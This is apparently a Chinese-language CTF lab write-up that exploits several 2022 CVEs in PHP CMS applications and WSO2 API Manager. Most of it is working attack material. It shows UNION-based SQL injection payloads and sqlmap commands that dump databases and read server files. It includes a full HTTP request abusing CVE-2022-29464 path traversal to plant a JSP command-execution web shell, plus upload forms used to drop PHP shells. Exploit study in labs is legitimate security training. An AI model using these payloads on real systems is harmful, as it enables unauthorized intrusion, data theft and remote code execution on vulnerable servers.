CVE-2022-32991
这里找一下源码审一下
根据漏洞编号搜到 源码名字
![image-20230115222340861](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115222340861.png)
![image-20230115222353905](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115222353905.png)
![image-20230115222410584](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115222410584.png)
<@urlencode>-60377db362694'<@/urlencode>
|
![image-20230115213445009](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213445009.png)
![image-20230115212910747](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115212910747.png)
![image-20230115213546242](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213546242.png)
60377db362694' order by 5 -- 60377db362694' order by 6 --
|
![image-20230115213635326](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213635326.png)
60377db362694' union select 1,2,3,4,5 --
|
![image-20230115213704382](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115213704382.png)
60377db362694' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5 --
|
![image-20230115214928863](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115214928863.png)
60377db362694' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='flag'),4,5 --
|
![image-20230115215425931](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115215425931.png)
60377db362694' union select 1,2,(select flag from ctf.flag),4,5 --
|
![image-20230115215421361](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230115215421361.png)
CVE-2022-30887
![image-20230116162156012](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116162156012.png)
![image-20230116162235456](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116162235456.png)
搭建起来
![image-20230116170609300](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170609300.png)
找一下用户名和密码
![image-20230116170550915](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170550915.png)
![image-20230116170626787](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170626787.png)
这里也很简单
![image-20230116170821250](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116170821250.png)
![image-20230116171831259](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171831259.png)
![image-20230116171844754](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171844754.png)
![image-20230116171901114](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171901114.png)
![image-20230116171912135](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171912135.png)
这里全是 任意文件上传
![image-20230116171953767](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116171953767.png)
CVE-2022-29464
https://github.com/wso2/product-apim/releases/tag/v4.0.0
|
![image-20230116195501169](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116195501169.png)
![image-20230116222901140](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116222901140.png)
POST /fileupload/toolsAny HTTP/2 Host: eci-2zebqk49mtyq78wkry75.cloudeci1.ichunqiu.com:9443 Accept: */* Accept-Encoding: gzip, deflate Content-Length: 882 Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0 User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0 Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) { e.printStackTrace(); } } %> <%=output %> --4ef9f369a86bfaadf5ec3177278d49c0--
|
![image-20230116202847100](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116202847100.png)
![image-20230116202915376](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116202915376.png)
![image-20230116202951988](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116202951988.png)
CVE-2022-28525
![image-20230116232055204](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116232055204.png)
![image-20230116232511034](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116232511034.png)
![image-20230116235842612](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230116235842612.png)
看了一下这几个 upload 发现这个是存在未授权 上传的
![image-20230117002013377](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002013377.png)
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>upload</title> </head> <body> <form action="http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/admin_includes/admin_edit_user.php" method="post" enctype="multipart/form-data"> <input type="text" name="updateusersubmit" value="123"> <input type="text" name="user_image" value="new"> <input type="file" name="new_image"><br> <input type="submit" value="上传">
</form> </body> </html>
|
![image-20230117002101427](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002101427.png)
构造一下表单
![image-20230117002142479](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002142479.png)
接着到对应目录访问即可
http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/images/zf.php
|
![image-20230117002224703](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117002224703.png)
CVE-2022-28512
![image-20230117010049685](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117010049685.png)
![image-20230117010104490](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117010104490.png)
配置数据库信息的时候可以全局搜索 blog_admin_db
将密码填上
![image-20230117191531945](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117191531945.png)
![image-20230117184440505](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117184440505.png)
很明显的sql注入
![image-20230117193804393](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193804393.png)
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5
|
![image-20230117193732861](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193732861.png)
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 --dbs
|
![image-20230117193544675](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193544675.png)
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf --tables
|
![image-20230117193620905](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117193620905.png)
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag --columns
|
![image-20230117195521827](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117195521827.png)
python .\sqlmap.py --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag -C flag --dump
|
![image-20230117195606487](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230117195606487.png)
CVE-2022-28060
![image-20230118011646639](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011646639.png)
![image-20230118011658660](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011658660.png)
![image-20230118011708449](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011708449.png)
明显的注入
![image-20230118191506590](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118191506590.png)
这里也是很明显的sql注入 因为正确的写法应该是
$user_name = mysqli_real_escape_string($con, $user_name);
|
而这里只是处理了字符没有 应用
![image-20230118192826387](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118192826387.png)
这里还有一个文件上传
![image-20230118192024783](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118192024783.png)
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>upload</title> </head> <body> <form action="http://stu/admin/includes/admin_add_post.php" method="post" enctype="multipart/form-data"> <input type="text" name="create_post" value="123"> <input type="file" name="post_image"><br> <input type="submit" value="上传">
</form> </body> </html>
|
![image-20230118192101130](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118192101130.png)
python .\sqlmap.py --batch -r D:\Download\sql.txt --dbs
|
![image-20230118194329594](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118194329594.png)
python .\sqlmap.py --batch -r D:\Download\sql.txt -D php_cms --tables
|
![image-20230118195001157](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118195001157.png)
没有flag 所以猜猜在文件里
python .\sqlmap.py --batch -r D:\Download\sql.txt --sql-shell
|
select load_file('/flag')
|
![image-20230118195726940](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118195726940.png)
CVE-2022-26201
![image-20230118011658660](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011658660.png)
![image-20230118011708449](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118011708449.png)
注入挺多的
![image-20230118230433411](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118230433411.png)
python .\sqlmap.py --batch -r D:\Download\sql.txt --dbs
|
![image-20230118230622204](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118230622204.png)
python .\sqlmap.py --batch -r D:\Download\sql.txt --file-read "/flag"
|
![image-20230118230656298](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118230656298.png)
CVE-2022-26965
![image-20230118200918518](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118200918518.png)
![image-20230118200938557](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118200938557.png)
![image-20230118215007351](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118215007351.png)
这里很明显文件上传 接着解压
admin 登录进去
![image-20230118223006889](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118223006889.png)
将 php压缩一下
![image-20230118223057584](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118223057584.png)
http://eci-2zeinn5hdxurnzllfr7s.cloudeci1.ichunqiu.com/data/themes/zf/zf.php
|
访问即可
![image-20230118223129303](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230118223129303.png)
CVE-2022-25578
![image-20230119170149088](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170149088.png)
![image-20230119170254538](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170254538.png)
admin tao 默认密码
![image-20230119170414046](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170414046.png)
![image-20230119170548516](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170548516.png)
![image-20230119170616878](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119170616878.png)
CVE-2022-25488
![image-20230119171427141](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119171427141.png)
![image-20230124185510868](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230124185510868.png)
![image-20230119173719305](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119173719305.png)
很明显的sql注入
python .\sqlmap.py --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --dbs
|
![image-20230119174011347](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119174011347.png)
python .\sqlmap.py --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --sql-shell
|
select load_file('/flag')
|
![image-20230119174027218](https://wanan-1310031509.cos.ap-beijing.myqcloud.com/img/image-20230119174027218.png)